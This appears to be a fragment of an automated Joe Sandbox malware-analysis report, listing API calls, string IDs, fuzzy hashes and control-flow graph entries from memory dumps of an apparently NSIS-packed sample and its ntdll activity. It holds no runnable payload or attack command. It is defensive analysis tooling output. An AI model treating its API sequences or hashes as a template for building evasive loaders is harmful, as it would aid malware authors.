                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: cb9d993be01e685dfe7cd00fa0de0d0758d56356e8e165fa58e03073aa526adb
                                                  • Instruction ID: 96a7dd71afdf10f79f90d708e6bdb3ac081e813424a41c2ffb499782564f136e
                                                  • Opcode Fuzzy Hash: cb9d993be01e685dfe7cd00fa0de0d0758d56356e8e165fa58e03073aa526adb
                                                  • Instruction Fuzzy Hash: F4014F71500208FBDB119F60DE05EAA3B29EB04709F008039F646B91D1CBB49955CF9D
                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD20DD
                                                    • Part of subcall function 73AD12AF: lstrcpynA.KERNEL32(00000000,?,73AD1502,?,73AD11C4,-000000A0), ref: 73AD12BF
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 73AD2042
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 73AD205A
                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 73AD206B
                                                  • CLSIDFromString.OLE32(00000000,00000000), ref: 73AD2081
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD2088
                                                    • Part of subcall function 73AD1958: VirtualAlloc.KERNEL32(00000000,00000010,00001000,00000040,?,73AD20A7,00000000,?), ref: 73AD198A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136024471445.0000000073AD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73AD0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_73ad0000_x.jbxd
                                                  Similarity
                                                  • API ID: Global$Alloc$Free$ByteCharFromMultiStringVirtualWidelstrcpyn
                                                  • String ID:
                                                  • API String ID: 506890080-0
                                                  • Opcode ID: 8a72934b7d72d4b6fbf9f642cd64c01d124da7da82ae700f3630b145b8404f4a
                                                  • Instruction ID: 1a0c218ec91386ab93a012bfff9959948bc6090f70d46a39de3b856052844bfc
                                                  • Opcode Fuzzy Hash: 8a72934b7d72d4b6fbf9f642cd64c01d124da7da82ae700f3630b145b8404f4a
                                                  • Instruction Fuzzy Hash: A341C572525205EFD345AF24E846BAAB7E8FF48700F54823FF8498A18EDB345951CBE1
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 73AD1163
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD11B0
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD11CD
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 73AD11E0
                                                  • GlobalFree.KERNEL32 ref: 73AD1249
                                                  • GlobalFree.KERNEL32(?), ref: 73AD1297
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD12A8
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136024471445.0000000073AD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73AD0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_73ad0000_x.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: d09014d73a4e95275733b63fa0817e6ba7bfc340925b8442dfbc895031b015f5
                                                  • Instruction ID: 5498e97d40b9808085e0b12c48a871cb809a1795f6e3224f51d91d9f00a00526
                                                  • Opcode Fuzzy Hash: d09014d73a4e95275733b63fa0817e6ba7bfc340925b8442dfbc895031b015f5
                                                  • Instruction Fuzzy Hash: 8551DFB25243009FE745DF79D952B25BBF8FB49204B14842EF48ACB29CD736E912CB90
                                                  APIs
                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403AB6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 0040620D
                                                  • CharPrevA.USER32(?,00000000), ref: 00406217
                                                  • lstrcatA.KERNEL32(?,00408298), ref: 00406228
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406207
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3355392842
                                                  • Opcode ID: bad418d4af1ebf64486b9eb99738b430292f36c280bef47347db2907ac8792f8
                                                  • Instruction ID: 3c495f3cc0a8455ad0d57a1320ed541fd21284608294d423194ca2ef8b277475
                                                  • Opcode Fuzzy Hash: bad418d4af1ebf64486b9eb99738b430292f36c280bef47347db2907ac8792f8
                                                  • Instruction Fuzzy Hash: 25D05E71101A20AFD2012714AE0CE8B3F58AF0631270604BAF582B2260CB38085287AD
                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD1C97
                                                  • GlobalFree.KERNEL32(?), ref: 73AD1D4E
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD1D51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136024471445.0000000073AD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73AD0000, based on PE: true
                                                  • Associated: 00000002.00000002.136024401230.0000000073AD0000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.136024537814.0000000073AD4000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.136024590519.0000000073AD6000.00000002.00000001.01000000.00000009.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_73ad0000_x.jbxd
                                                  Similarity
                                                  • API ID: FreeGlobal
                                                  • String ID: /
                                                  • API String ID: 2979337801-2043925204
                                                  • Opcode ID: 475be69663a38e1d0ac65ea97ad3691e3e55e71a8790af6628f1bb3aadf5af7b
                                                  • Instruction ID: a7c3e91251f6067f850f22a4360102cc56170aa91ad5935d17e8a1b6abd2609b
                                                  • Opcode Fuzzy Hash: 475be69663a38e1d0ac65ea97ad3691e3e55e71a8790af6628f1bb3aadf5af7b
                                                  • Instruction Fuzzy Hash: D6511A72A3C3854FE3D29E75858732A66FABB8E100F580B1FE0D28335CDBA5D8454362
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,0040334E), ref: 0040316F
                                                  • GetTickCount.KERNEL32 ref: 0040318E
                                                  • CreateDialogParamA.USER32(0000006F,00000000,00403424,00000000), ref: 004031AD
                                                  • ShowWindow.USER32(00000000,00000005), ref: 004031BB
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: 978edb9a71616790b966c465537ea2c7d484158e7995eac0d890d3008c97679c
                                                  • Instruction ID: 14c6daf26f2ba902eba0c89fbd035ef2e3980b9ad237a5036cf4e57ec4455238
                                                  • Opcode Fuzzy Hash: 978edb9a71616790b966c465537ea2c7d484158e7995eac0d890d3008c97679c
                                                  • Instruction Fuzzy Hash: 07F0D430650704BBDB15AF24EF4DB163AA8F744B4AF8445B9E540BA2E1EB7C4444CA1C
                                                  APIs
                                                  • wsprintfA.USER32 ref: 73AD1EA4
                                                  • lstrcpyA.KERNEL32(?,error,00000818,73AD16E5,00000000,?), ref: 73AD1EC4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136024471445.0000000073AD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73AD0000, based on PE: true
                                                  • Associated: 00000002.00000002.136024401230.0000000073AD0000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.136024537814.0000000073AD4000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.136024590519.0000000073AD6000.00000002.00000001.01000000.00000009.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_73ad0000_x.jbxd
                                                  Similarity
                                                  • API ID: lstrcpywsprintf
                                                  • String ID: callback%d$error
                                                  • API String ID: 2408954437-1307476583
                                                  • Opcode ID: 009d5d7460e277057d21e3d49246320bba7ba56e6a8b8be629764ddb15ba5742
                                                  • Instruction ID: e6e4830bcaa072f283c672a286262d869a39888dcdc9218de8eed845bcf25966
                                                  • Opcode Fuzzy Hash: 009d5d7460e277057d21e3d49246320bba7ba56e6a8b8be629764ddb15ba5742
                                                  • Instruction Fuzzy Hash: A1F05E312141209FC7049B04E84AFB673EAFF88300F09C4AEF8499724DCF74AC018B95
                                                  APIs
                                                  • DispatchMessageA.USER32(?), ref: 00405F84
                                                  • PeekMessageA.USER32(?,00000000,?,N3@,00000001), ref: 00405F98
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: Message$DispatchPeek
                                                  • String ID: N3@
                                                  • API String ID: 1770753511-133324152
                                                  • Opcode ID: 1adb22ebabfbfad76f18fd6e83556fb283b3a93a0faec1d1b16a7c0a08b498de
                                                  • Instruction ID: d163192144520e620c39002f5eb6f3343bd6a6af6b02d706f75ca1fefbd95399
                                                  • Opcode Fuzzy Hash: 1adb22ebabfbfad76f18fd6e83556fb283b3a93a0faec1d1b16a7c0a08b498de
                                                  • Instruction Fuzzy Hash: F6D01231A0020EBBDF109FA0CD09FAB7B6CAF04744F408026FE41A5090DB78D1168B69

                                                  Execution Graph

                                                  Execution Coverage:0%
                                                  Dynamic/Decrypted Code Coverage:98.7%
                                                  Signature Coverage:22.7%
                                                  Total number of Nodes:75
                                                  Total number of Limit Nodes:0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2 345434e0-345434ec LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: d700cd5ab5ba8af8349f25260f135a945b827216b468e4b3ddb0b7b0274328e1
                                                  • Instruction ID: f04f6e881b986b5626af6717bb8c1bf604c6e60ceea3dc5a3a254c5685f889f1
                                                  • Opcode Fuzzy Hash: d700cd5ab5ba8af8349f25260f135a945b827216b468e4b3ddb0b7b0274328e1
                                                  • Instruction Fuzzy Hash: 0C900231A0510812D50061584624716104587D0245F61CC57A0425529DC7A5C96975A2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1 34542d10-34542d1c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: f3af53940c7fe105cb9df1ac165ef58f4927ff3b86bf07d44f2a071f9bb09bb1
                                                  • Instruction ID: a509d7164138cb9862dd07df1825b1b3c17fbf9becb717fd2b42fe98333e820b
                                                  • Opcode Fuzzy Hash: f3af53940c7fe105cb9df1ac165ef58f4927ff3b86bf07d44f2a071f9bb09bb1
                                                  • Instruction Fuzzy Hash: 6990023160100823D51161584614717004987D0285F91CC57A0425519DD666C96AB121

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 34542b90-34542b9c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 728e08d8e7f346458b71e5e3c55bbbd041e7d7833637cbf7edb06d51863f3885
                                                  • Instruction ID: 9cd335d8333d591f72331e336e71dcffd7b74543647ede7c692fad89f25effe9
                                                  • Opcode Fuzzy Hash: 728e08d8e7f346458b71e5e3c55bbbd041e7d7833637cbf7edb06d51863f3885
                                                  • Instruction Fuzzy Hash: 6790023160108C12D5106158851475A004587D0345F55CC57A4425619DC6A5C8A97121

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $ $0
                                                  • API String ID: 3446177414-3352262554
                                                  • Opcode ID: c7877cc2ff08107a65438de50ab66ac8747e2dc7643a3f4b0137f018419616bc
                                                  • Instruction ID: be745a6b128244ff8f542acf6b9319ba4ac8ebf0b3c1296ed5c3ade24ef38b27
                                                  • Opcode Fuzzy Hash: c7877cc2ff08107a65438de50ab66ac8747e2dc7643a3f4b0137f018419616bc
                                                  • Instruction Fuzzy Hash: 3F32FFB5A083818FE351CF68D884B5EBBE5BB88344F404D2EF5998B250DB74E948DF52

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                  • API String ID: 3446177414-1700792311
                                                  • Opcode ID: a572bf37b0c776de3ac32b9f00893fd0f450a690b3d83d7168f099e9e7c64523
                                                  • Instruction ID: ce05a561abc150c23f9a994db495759f6a3067ea8f3f6afa196e66fac19e86c4
                                                  • Opcode Fuzzy Hash: a572bf37b0c776de3ac32b9f00893fd0f450a690b3d83d7168f099e9e7c64523
                                                  • Instruction Fuzzy Hash: CBD1EF36908685DFEF02CFA4D800AADFBF1FF4AB04F448499E484AB652C7369945EF11

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.R4
                                                  • API String ID: 0-4152826611
                                                  • Opcode ID: 396109386393a79daa2f3fe395af8ee195dc5bece5bf4e431cca38192150d3f2
                                                  • Instruction ID: 4fcaebf0f0eda806aff6a0598634291d89e1067dd96d6f610a5a8e5efed2af72
                                                  • Opcode Fuzzy Hash: 396109386393a79daa2f3fe395af8ee195dc5bece5bf4e431cca38192150d3f2
                                                  • Instruction Fuzzy Hash: 4BB19AB69083519FEB21CF24D840A5BB7E8AB88754F40493EF98A97350DB71D908DB92
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                  • API String ID: 3446177414-1745908468
                                                  • Opcode ID: cca102d3f53f1972b14e4c0570063a98d2d6a1893d903ba4df6873e5536b473d
                                                  • Instruction ID: 37291b806b2066c95157a8eab5433db0588c32d529feb1a71e8fb4c6cd8503c1
                                                  • Opcode Fuzzy Hash: cca102d3f53f1972b14e4c0570063a98d2d6a1893d903ba4df6873e5536b473d
                                                  • Instruction Fuzzy Hash: 4391BC36E05684DFEB02CFA8D840A9DBBF1FF4A314F44846EE445EB652CB369941EB14
                                                  APIs
                                                  • RtlDebugPrintTimes.NTDLL ref: 344F651C
                                                    • Part of subcall function 344F6565: RtlDebugPrintTimes.NTDLL ref: 344F6614
                                                    • Part of subcall function 344F6565: RtlDebugPrintTimes.NTDLL ref: 344F665F
                                                  Strings
                                                  • apphelp.dll, xrefs: 344F6446
                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 34559790
                                                  • LdrpInitShimEngine, xrefs: 34559783, 34559796, 345597BF
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 345597A0, 345597C9
                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3455977C
                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 345597B9
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-204845295
                                                  • Opcode ID: 53a717ef32e3c7caf6374b7c8f54893cbf77291f54fb488b38ce8680228d53c8
                                                  • Instruction ID: fa68f46e87b682367cd59448fc353f0013ea4a807850e4f4a6b061d81d74aedc
                                                  • Opcode Fuzzy Hash: 53a717ef32e3c7caf6374b7c8f54893cbf77291f54fb488b38ce8680228d53c8
                                                  • Instruction Fuzzy Hash: 9B51BE71A08700DFE720DF20D890A6B77E8FB84244F40096EF995A71A1EB35EA45DF93
                                                  Strings
                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 344FD136
                                                  • @, xrefs: 344FD24F
                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 344FD06F
                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 344FD0E6
                                                  • @, xrefs: 344FD2B3
                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 344FD263
                                                  • h.R4, xrefs: 3455A5D2
                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 344FD202
                                                  • @, xrefs: 344FD09D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.R4
                                                  • API String ID: 0-1042752141
                                                  • Opcode ID: bd949e7bae8153900b81eaf16f58d70b3e7cdcc42469239bc7771114656713ea
                                                  • Instruction ID: fcd6b1bd818f8fa779629968fb97a807ca12ab3117b5c5f3cc34e924ffe3aabb
                                                  • Opcode Fuzzy Hash: bd949e7bae8153900b81eaf16f58d70b3e7cdcc42469239bc7771114656713ea
                                                  • Instruction Fuzzy Hash: 19A16CB1908345DFEB21CF20D940B5BB7E8BB84765F40492EFA8A96240DB75D908DF93
                                                  APIs
                                                  • RtlDebugPrintTimes.NTDLL ref: 3452D879
                                                    • Part of subcall function 34504779: RtlDebugPrintTimes.NTDLL ref: 34504817
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-1975516107
                                                  • Opcode ID: c0ee4e64355161c42d55014f55f906b6cd43e08cf40b5cb899b5d0a49bb21eb7
                                                  • Instruction ID: 4a93e13b7103619835917b095969c4b5acdd2175c2480c754f350128d547e8f8
                                                  • Opcode Fuzzy Hash: c0ee4e64355161c42d55014f55f906b6cd43e08cf40b5cb899b5d0a49bb21eb7
                                                  • Instruction Fuzzy Hash: 1151DF76E04349DFEB04CFA4C48479DBBB1FF84314FA4415AD901AB2C2D774A98AEB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                  • API String ID: 0-2224505338
